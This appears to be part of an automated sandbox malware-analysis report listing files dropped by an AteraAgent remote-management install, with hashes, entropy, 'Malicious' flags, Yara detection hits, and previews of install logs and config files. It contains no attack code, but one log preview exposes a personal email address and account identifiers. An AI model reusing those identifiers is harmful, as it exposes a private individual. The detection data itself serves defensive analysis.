                                                                                                                                                                                                                                        SHA-512:BF95FA3B93A25E040D3521BF8436BBA505D09F659360C0606F259607083D9C4F1366683CFE0215D4F13CE875E753B12F1DE058A3D0CBB84C3948644D0E7BDEEB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55856
                                                                                                                                                                                                                                        Entropy (8bit):6.2394409505734165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:rREoc0f5k1KlLoz0WOySMEpnSO7iX16UJKdiYpBEpYinAMxCWLa:rR8+5k15z0WBZEtgwJq7Hx3u
                                                                                                                                                                                                                                        MD5:89D62604A1CA22A2F8FFD987B543D38E
                                                                                                                                                                                                                                        SHA1:64D7D345821AA76971BB9EF71CE731CCD9BFAC32
                                                                                                                                                                                                                                        SHA-256:80D4A38A5C0F117AFC7FC74A3F2DA39259BDD980BBA85687FF2019C8262E171D
                                                                                                                                                                                                                                        SHA-512:1173C7AFE2719EF324342A6D3EA459319533843CFE8A04CDC63FCF3D8A2D6DC4BB537FC1A4DBA63F585EB11F3E16FB2F17C53BC64BC7318A52B44266A3A9A56E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):753
                                                                                                                                                                                                                                        Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                        MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                        SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                        SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                        SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7466
                                                                                                                                                                                                                                        Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                        MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                        SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                        SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                        SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):258
                                                                                                                                                                                                                                        Entropy (8bit):5.161157427052415
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:ATbdAD89w3pKFSQlZh61VIlGUA/DtbXv9DX:Sb+7MSQzh61/htbfVX
                                                                                                                                                                                                                                        MD5:ABCF80416A3928A1D589396C71B421FF
                                                                                                                                                                                                                                        SHA1:C4C2633F4E2130CAEB7EEFD7665AF61D67A13D07
                                                                                                                                                                                                                                        SHA-256:511B7C3B52BD2F2C1E13BA21FA425DFA9901F3CCA0267D991EFD3F07D57B1421
                                                                                                                                                                                                                                        SHA-512:E8B086C4BE01661493447A00FAE4C05ACB6B6D963CF4C2E21F2856F54DA865508523C571A5775F1A313D01AADC8B8D117B48BC79191C24DEB731932263C745EF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:/i /IntegratorLogin=barrostransportes2018@gmail.com /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000MHGA9IAP /AgentId=3757c761-9e50-4f15-8086-0e584dceea48.02/10/2024 09:58:00 Trace Starting..02/10/2024 11:19:47 Trace Starting..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):178
                                                                                                                                                                                                                                        Entropy (8bit):5.251448581447606
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:5PbTsPGxIaFczjCp/qrvb6UgMHDxXpxVNHPQjwvEfrsf3J2MzqRI+OPkvOy:RbTv+zepSrvbRgMHDlpxVNkw8j25rmR9
                                                                                                                                                                                                                                        MD5:33976839322C96D897414B618350AC00
                                                                                                                                                                                                                                        SHA1:8F73680B177C1DADFB309585089223201F711DFD
                                                                                                                                                                                                                                        SHA-256:0CA1890013FAD4B1F384BCE8409E53C92CBB2468D1DCBDD665D7A25A827266BF
                                                                                                                                                                                                                                        SHA-512:D50A2B8C3CB6417EA6F83FD7FE82CBED858D491714736CE500D1A5ADA96572DE730A19DC37C218C709A7BFE376E2B07FFFACC22FD9D2D40CDBC4CBF8F6A3114E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:eyJJZCI6Ijc1MmNmN2JhLWVmYWYtNGMwZS1iYWZmLWI5ZTY1N2JhODViNiIsIkNyZWF0ZWQiOiIyMDI0LTEwLTAyVDExOjIwOjMyLjU3Mzg2MjYtMDQ6MDAiLCJNZXNzYWdlIjoiX0lOSVRfIiwiVGltZW91dCI6IjAwOjAxOjAwIn0=..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):258
                                                                                                                                                                                                                                        Entropy (8bit):5.161157427052415
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:ATbdAD89w3pKFSQlZh61VIlGUA/DtbXv9DX:Sb+7MSQzh61/htbfVX
                                                                                                                                                                                                                                        MD5:ABCF80416A3928A1D589396C71B421FF
                                                                                                                                                                                                                                        SHA1:C4C2633F4E2130CAEB7EEFD7665AF61D67A13D07
                                                                                                                                                                                                                                        SHA-256:511B7C3B52BD2F2C1E13BA21FA425DFA9901F3CCA0267D991EFD3F07D57B1421
                                                                                                                                                                                                                                        SHA-512:E8B086C4BE01661493447A00FAE4C05ACB6B6D963CF4C2E21F2856F54DA865508523C571A5775F1A313D01AADC8B8D117B48BC79191C24DEB731932263C745EF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:/i /IntegratorLogin=barrostransportes2018@gmail.com /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000MHGA9IAP /AgentId=3757c761-9e50-4f15-8086-0e584dceea48.02/10/2024 09:58:00 Trace Starting..02/10/2024 11:19:47 Trace Starting..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
